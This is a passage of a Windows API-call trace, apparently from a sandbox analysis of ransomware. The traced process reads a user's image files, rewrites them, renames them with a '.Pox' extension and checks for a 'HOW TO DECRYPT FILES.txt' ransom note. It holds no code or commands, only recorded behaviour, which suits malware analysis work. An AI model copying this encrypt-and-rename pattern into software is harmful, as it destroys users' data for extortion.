HALPmcxz\\Pictures\\VpubQOvc\\2xdnrnaXUHwWYk2evk3\\s95FnDm 7mO2PYSi2\\sg-E3ucFPLsX3qelYBy.jpg.Pox", lpFilePart=0x0) returned 0x71 [0040.833] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae3ec) returned 1 [0040.833] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\2xdnrnaXUHwWYk2evk3\\s95FnDm 7mO2PYSi2\\sg-E3ucFPLsX3qelYBy.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vpubqovc\\2xdnrnaxuhwwyk2evk3\\s95fndm 7mo2pysi2\\sg-e3ucfplsx3qelyby.jpg"), fInfoLevelId=0x0, lpFileInformation=0x3ae468 | out: lpFileInformation=0x3ae468*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xde7642d0, ftCreationTime.dwHighDateTime=0x1d4ce43, ftLastAccessTime.dwLowDateTime=0x4b77490, ftLastAccessTime.dwHighDateTime=0x1d4d5ac, ftLastWriteTime.dwLowDateTime=0x2a861fa0, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x5510)) returned 1 [0040.833] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae3e8) returned 1 [0040.834] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\2xdnrnaXUHwWYk2evk3\\s95FnDm 7mO2PYSi2\\sg-E3ucFPLsX3qelYBy.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vpubqovc\\2xdnrnaxuhwwyk2evk3\\s95fndm 7mo2pysi2\\sg-e3ucfplsx3qelyby.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\2xdnrnaXUHwWYk2evk3\\s95FnDm 7mO2PYSi2\\sg-E3ucFPLsX3qelYBy.jpg.Pox" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vpubqovc\\2xdnrnaxuhwwyk2evk3\\s95fndm 7mo2pysi2\\sg-e3ucfplsx3qelyby.jpg.pox")) returned 1 [0040.834] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\2xdnrnaXUHwWYk2evk3\\s95FnDm 7mO2PYSi2\\TEavp.bmp", nBufferLength=0x105, lpBuffer=0x3ade6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\2xdnrnaXUHwWYk2evk3\\s95FnDm 7mO2PYSi2\\TEavp.bmp", lpFilePart=0x0) returned 0x5f [0040.834] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae360) returned 1 [0040.834] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\2xdnrnaXUHwWYk2evk3\\s95FnDm 7mO2PYSi2\\TEavp.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vpubqovc\\2xdnrnaxuhwwyk2evk3\\s95fndm 7mo2pysi2\\teavp.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0040.834] GetFileType (hFile=0x26c) returned 0x1 [0040.834] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae35c) returned 1 [0040.834] GetFileType (hFile=0x26c) returned 0x1 [0040.834] GetFileSize (in: hFile=0x26c, lpFileSizeHigh=0x3ae468 | out: lpFileSizeHigh=0x3ae468*=0x0) returned 0xe310 [0040.835] ReadFile (in: hFile=0x26c, lpBuffer=0x2401f24, nNumberOfBytesToRead=0xe310, lpNumberOfBytesRead=0x3ae414, lpOverlapped=0x0 | out: lpBuffer=0x2401f24*, lpNumberOfBytesRead=0x3ae414*=0xe310, lpOverlapped=0x0) returned 1 [0040.836] CloseHandle (hObject=0x26c) returned 1 [0040.852] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", nBufferLength=0x105, lpBuffer=0x3adf80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", lpFilePart=0x0) returned 0x3e [0040.852] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae3e0) returned 1 [0040.852] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\how to decrypt files.txt"), fInfoLevelId=0x0, lpFileInformation=0x3ae45c | out: lpFileInformation=0x3ae45c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0040.852] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae3dc) returned 1 [0040.852] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\2xdnrnaXUHwWYk2evk3\\s95FnDm 7mO2PYSi2\\TEavp.bmp", nBufferLength=0x105, lpBuffer=0x3ade58, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\2xdnrnaXUHwWYk2evk3\\s95FnDm 7mO2PYSi2\\TEavp.bmp", lpFilePart=0x0) returned 0x5f [0040.853] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae34c) returned 1 [0040.853] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\2xdnrnaXUHwWYk2evk3\\s95FnDm 7mO2PYSi2\\TEavp.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vpubqovc\\2xdnrnaxuhwwyk2evk3\\s95fndm 7mo2pysi2\\teavp.bmp"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0040.854] GetFileType (hFile=0x26c) returned 0x1 [0040.854] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae348) returned 1 [0040.854] GetFileType (hFile=0x26c) returned 0x1 [0040.854] WriteFile (in: hFile=0x26c, lpBuffer=0x24797dc*, nNumberOfBytesToWrite=0xe320, lpNumberOfBytesWritten=0x3ae408, lpOverlapped=0x0 | out: lpBuffer=0x24797dc*, lpNumberOfBytesWritten=0x3ae408*=0xe320, lpOverlapped=0x0) returned 1 [0040.855] CloseHandle (hObject=0x26c) returned 1 [0040.857] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\2xdnrnaXUHwWYk2evk3\\s95FnDm 7mO2PYSi2\\TEavp.bmp", nBufferLength=0x105, lpBuffer=0x3adf8c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\2xdnrnaXUHwWYk2evk3\\s95FnDm 7mO2PYSi2\\TEavp.bmp", lpFilePart=0x0) returned 0x5f [0040.857] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\2xdnrnaXUHwWYk2evk3\\s95FnDm 7mO2PYSi2\\TEavp.bmp.Pox", nBufferLength=0x105, lpBuffer=0x3adf8c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\2xdnrnaXUHwWYk2evk3\\s95FnDm 7mO2PYSi2\\TEavp.bmp.Pox", lpFilePart=0x0) returned 0x63 [0040.857] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae3ec) returned 1 [0040.857] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\2xdnrnaXUHwWYk2evk3\\s95FnDm 7mO2PYSi2\\TEavp.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vpubqovc\\2xdnrnaxuhwwyk2evk3\\s95fndm 7mo2pysi2\\teavp.bmp"), fInfoLevelId=0x0, lpFileInformation=0x3ae468 | out: lpFileInformation=0x3ae468*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2064a230, ftCreationTime.dwHighDateTime=0x1d4d56b, ftLastAccessTime.dwLowDateTime=0xdbc64410, ftLastAccessTime.dwHighDateTime=0x1d4c85b, ftLastWriteTime.dwLowDateTime=0x2a888100, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0xe320)) returned 1 [0040.857] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae3e8) returned 1 [0040.857] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\2xdnrnaXUHwWYk2evk3\\s95FnDm 7mO2PYSi2\\TEavp.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vpubqovc\\2xdnrnaxuhwwyk2evk3\\s95fndm 7mo2pysi2\\teavp.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\2xdnrnaXUHwWYk2evk3\\s95FnDm 7mO2PYSi2\\TEavp.bmp.Pox" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vpubqovc\\2xdnrnaxuhwwyk2evk3\\s95fndm 7mo2pysi2\\teavp.bmp.pox")) returned 1 [0040.857] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\2xdnrnaXUHwWYk2evk3\\s95FnDm 7mO2PYSi2\\y5ZkF.bmp", nBufferLength=0x105, lpBuffer=0x3ade6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\2xdnrnaXUHwWYk2evk3\\s95FnDm 7mO2PYSi2\\y5ZkF.bmp", lpFilePart=0x0) returned 0x5f [0040.857] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae360) returned 1 [0040.858] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\2xdnrnaXUHwWYk2evk3\\s95FnDm 7mO2PYSi2\\y5ZkF.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vpubqovc\\2xdnrnaxuhwwyk2evk3\\s95fndm 7mo2pysi2\\y5zkf.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0040.858] GetFileType (hFile=0x26c) returned 0x1 [0040.858] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae35c) returned 1 [0040.858] GetFileType (hFile=0x26c) returned 0x1 [0040.858] GetFileSize (in: hFile=0x26c, lpFileSizeHigh=0x3ae468 | out: lpFileSizeHigh=0x3ae468*=0x0) returned 0x15127 [0040.858] ReadFile (in: hFile=0x26c, lpBuffer=0x35bce28, nNumberOfBytesToRead=0x15127, lpNumberOfBytesRead=0x3ae414, lpOverlapped=0x0 | out: lpBuffer=0x35bce28*, lpNumberOfBytesRead=0x3ae414*=0x15127, lpOverlapped=0x0) returned 1 [0040.859] CloseHandle (hObject=0x26c) returned 1 [0040.875] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", nBufferLength=0x105, lpBuffer=0x3adf80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", lpFilePart=0x0) returned 0x3e [0040.875] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae3e0) returned 1 [0040.875] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\how to decrypt files.txt"), fInfoLevelId=0x0, lpFileInformation=0x3ae45c | out: lpFileInformation=0x3ae45c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0040.875] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae3dc) returned 1 [0040.875] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\2xdnrnaXUHwWYk2evk3\\s95FnDm 7mO2PYSi2\\y5ZkF.bmp", nBufferLength=0x105, lpBuffer=0x3ade58, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\2xdnrnaXUHwWYk2evk3\\s95FnDm 7mO2PYSi2\\y5ZkF.bmp", lpFilePart=0x0) returned 0x5f [0040.932] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae34c) returned 1 [0040.932] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\2xdnrnaXUHwWYk2evk3\\s95FnDm 7mO2PYSi2\\y5ZkF.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vpubqovc\\2xdnrnaxuhwwyk2evk3\\s95fndm 7mo2pysi2\\y5zkf.bmp"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0040.934] GetFileType (hFile=0x26c) returned 0x1 [0040.934] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae348) returned 1 [0040.934] GetFileType (hFile=0x26c) returned 0x1 [0040.934] WriteFile (in: hFile=0x26c, lpBuffer=0x3626450*, nNumberOfBytesToWrite=0x15130, lpNumberOfBytesWritten=0x3ae408, lpOverlapped=0x0 | out: lpBuffer=0x3626450*, lpNumberOfBytesWritten=0x3ae408*=0x15130, lpOverlapped=0x0) returned 1 [0040.936] CloseHandle (hObject=0x26c) returned 1 [0040.937] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\2xdnrnaXUHwWYk2evk3\\s95FnDm 7mO2PYSi2\\y5ZkF.bmp", nBufferLength=0x105, lpBuffer=0x3adf8c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\2xdnrnaXUHwWYk2evk3\\s95FnDm 7mO2PYSi2\\y5ZkF.bmp", lpFilePart=0x0) returned 0x5f [0040.937] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\2xdnrnaXUHwWYk2evk3\\s95FnDm 7mO2PYSi2\\y5ZkF.bmp.Pox", nBufferLength=0x105, lpBuffer=0x3adf8c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\2xdnrnaXUHwWYk2evk3\\s95FnDm 7mO2PYSi2\\y5ZkF.bmp.Pox", lpFilePart=0x0) returned 0x63 [0040.937] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae3ec) returned 1 [0040.937] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\2xdnrnaXUHwWYk2evk3\\s95FnDm 7mO2PYSi2\\y5ZkF.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vpubqovc\\2xdnrnaxuhwwyk2evk3\\s95fndm 7mo2pysi2\\y5zkf.bmp"), fInfoLevelId=0x0, lpFileInformation=0x3ae468 | out: lpFileInformation=0x3ae468*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe7aa2870, ftCreationTime.dwHighDateTime=0x1d4d10f, ftLastAccessTime.dwLowDateTime=0xa3643690, ftLastAccessTime.dwHighDateTime=0x1d4d111, ftLastWriteTime.dwLowDateTime=0x2a9467e0, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x15130)) returned 1 [0040.937] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae3e8) returned 1 [0040.937] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\2xdnrnaXUHwWYk2evk3\\s95FnDm 7mO2PYSi2\\y5ZkF.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vpubqovc\\2xdnrnaxuhwwyk2evk3\\s95fndm 7mo2pysi2\\y5zkf.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\2xdnrnaXUHwWYk2evk3\\s95FnDm 7mO2PYSi2\\y5ZkF.bmp.Pox" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vpubqovc\\2xdnrnaxuhwwyk2evk3\\s95fndm 7mo2pysi2\\y5zkf.bmp.pox")) returned 1 [0040.938] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae618) returned 1 [0040.938] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music", nBufferLength=0x105, lpBuffer=0x3ae120, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music", lpFilePart=0x0) returned 0x23 [0040.938] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\", nBufferLength=0x105, lpBuffer=0x3ae0f4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\", lpFilePart=0x0) returned 0x24 [0040.938] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*", lpFindFileData=0x3ae340 | out: lpFindFileData=0x3ae340*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x17e9b820, ftLastAccessTime.dwHighDateTime=0x1d53803, ftLastWriteTime.dwLowDateTime=0x17e9b820, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x406088 [0040.939] FindNextFileW (in: hFindFile=0x406088, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x17e9b820, ftLastAccessTime.dwHighDateTime=0x1d53803, ftLastWriteTime.dwLowDateTime=0x17e9b820, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.939] FindNextFileW (in: hFindFile=0x406088, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4cf9fbe0, ftCreationTime.dwHighDateTime=0x1d4cf7d, ftLastAccessTime.dwLowDateTime=0xdaf8cda0, ftLastAccessTime.dwHighDateTime=0x1d4c5b8, ftLastWriteTime.dwLowDateTime=0xdaf8cda0, ftLastWriteTime.dwHighDateTime=0x1d4c5b8, nFileSizeHigh=0x0, nFileSizeLow=0x11711, dwReserved0=0x0, dwReserved1=0x0, cFileName="4sOA0gb.wav", cAlternateFileName="")) returned 1 [0040.939] FindNextFileW (in: hFindFile=0x406088, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0040.939] FindNextFileW (in: hFindFile=0x406088, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa798b360, ftCreationTime.dwHighDateTime=0x1d4d2d0, ftLastAccessTime.dwLowDateTime=0xa7fe1a00, ftLastAccessTime.dwHighDateTime=0x1d4c69d, ftLastWriteTime.dwLowDateTime=0xa7fe1a00, ftLastWriteTime.dwHighDateTime=0x1d4c69d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FBbg9d", cAlternateFileName="")) returned 1 [0040.939] FindNextFileW (in: hFindFile=0x406088, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4b39a7f0, ftCreationTime.dwHighDateTime=0x1d4d122, ftLastAccessTime.dwLowDateTime=0xf88d5ff0, ftLastAccessTime.dwHighDateTime=0x1d4c948, ftLastWriteTime.dwLowDateTime=0xf88d5ff0, ftLastWriteTime.dwHighDateTime=0x1d4c948, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="OTVDMA8CV6qQ", cAlternateFileName="OTVDMA~1")) returned 1 [0040.939] FindNextFileW (in: hFindFile=0x406088, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfc8716a0, ftCreationTime.dwHighDateTime=0x1d4d36b, ftLastAccessTime.dwLowDateTime=0x872f6440, ftLastAccessTime.dwHighDateTime=0x1d4d2c4, ftLastWriteTime.dwLowDateTime=0x872f6440, ftLastWriteTime.dwHighDateTime=0x1d4d2c4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="_NBsFIdM9cm", cAlternateFileName="_NBSFI~1")) returned 1 [0040.940] FindNextFileW (in: hFindFile=0x406088, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfc8716a0, ftCreationTime.dwHighDateTime=0x1d4d36b, ftLastAccessTime.dwLowDateTime=0x872f6440, ftLastAccessTime.dwHighDateTime=0x1d4d2c4, ftLastWriteTime.dwLowDateTime=0x872f6440, ftLastWriteTime.dwHighDateTime=0x1d4d2c4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="_NBsFIdM9cm", cAlternateFileName="_NBSFI~1")) returned 0 [0040.940] FindClose (in: hFindFile=0x406088 | out: hFindFile=0x406088) returned 1 [0040.940] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae5d8) returned 1 [0040.940] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae5e4) returned 1 [0040.940] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae618) returned 1 [0040.940] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music", nBufferLength=0x105, lpBuffer=0x3ae120, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music", lpFilePart=0x0) returned 0x23 [0040.940] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\", nBufferLength=0x105, lpBuffer=0x3ae0f4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\", lpFilePart=0x0) returned 0x24 [0040.940] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*", lpFindFileData=0x3ae340 | out: lpFindFileData=0x3ae340*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x17e9b820, ftLastAccessTime.dwHighDateTime=0x1d53803, ftLastWriteTime.dwLowDateTime=0x17e9b820, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x406088 [0040.940] FindNextFileW (in: hFindFile=0x406088, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x17e9b820, ftLastAccessTime.dwHighDateTime=0x1d53803, ftLastWriteTime.dwLowDateTime=0x17e9b820, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.941] FindNextFileW (in: hFindFile=0x406088, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4cf9fbe0, ftCreationTime.dwHighDateTime=0x1d4cf7d, ftLastAccessTime.dwLowDateTime=0xdaf8cda0, ftLastAccessTime.dwHighDateTime=0x1d4c5b8, ftLastWriteTime.dwLowDateTime=0xdaf8cda0, ftLastWriteTime.dwHighDateTime=0x1d4c5b8, nFileSizeHigh=0x0, nFileSizeLow=0x11711, dwReserved0=0x0, dwReserved1=0x0, cFileName="4sOA0gb.wav", cAlternateFileName="")) returned 1 [0040.941] FindNextFileW (in: hFindFile=0x406088, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0040.941] FindNextFileW (in: hFindFile=0x406088, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa798b360, ftCreationTime.dwHighDateTime=0x1d4d2d0, ftLastAccessTime.dwLowDateTime=0xa7fe1a00, ftLastAccessTime.dwHighDateTime=0x1d4c69d, ftLastWriteTime.dwLowDateTime=0xa7fe1a00, ftLastWriteTime.dwHighDateTime=0x1d4c69d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FBbg9d", cAlternateFileName="")) returned 1 [0040.941] FindNextFileW (in: hFindFile=0x406088, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4b39a7f0, ftCreationTime.dwHighDateTime=0x1d4d122, ftLastAccessTime.dwLowDateTime=0xf88d5ff0, ftLastAccessTime.dwHighDateTime=0x1d4c948, ftLastWriteTime.dwLowDateTime=0xf88d5ff0, ftLastWriteTime.dwHighDateTime=0x1d4c948, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="OTVDMA8CV6qQ", cAlternateFileName="OTVDMA~1")) returned 1 [0040.941] FindNextFileW (in: hFindFile=0x406088, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfc8716a0, ftCreationTime.dwHighDateTime=0x1d4d36b, ftLastAccessTime.dwLowDateTime=0x872f6440, ftLastAccessTime.dwHighDateTime=0x1d4d2c4, ftLastWriteTime.dwLowDateTime=0x872f6440, ftLastWriteTime.dwHighDateTime=0x1d4d2c4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="_NBsFIdM9cm", cAlternateFileName="_NBSFI~1")) returned 1 [0040.941] FindNextFileW (in: hFindFile=0x406088, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, 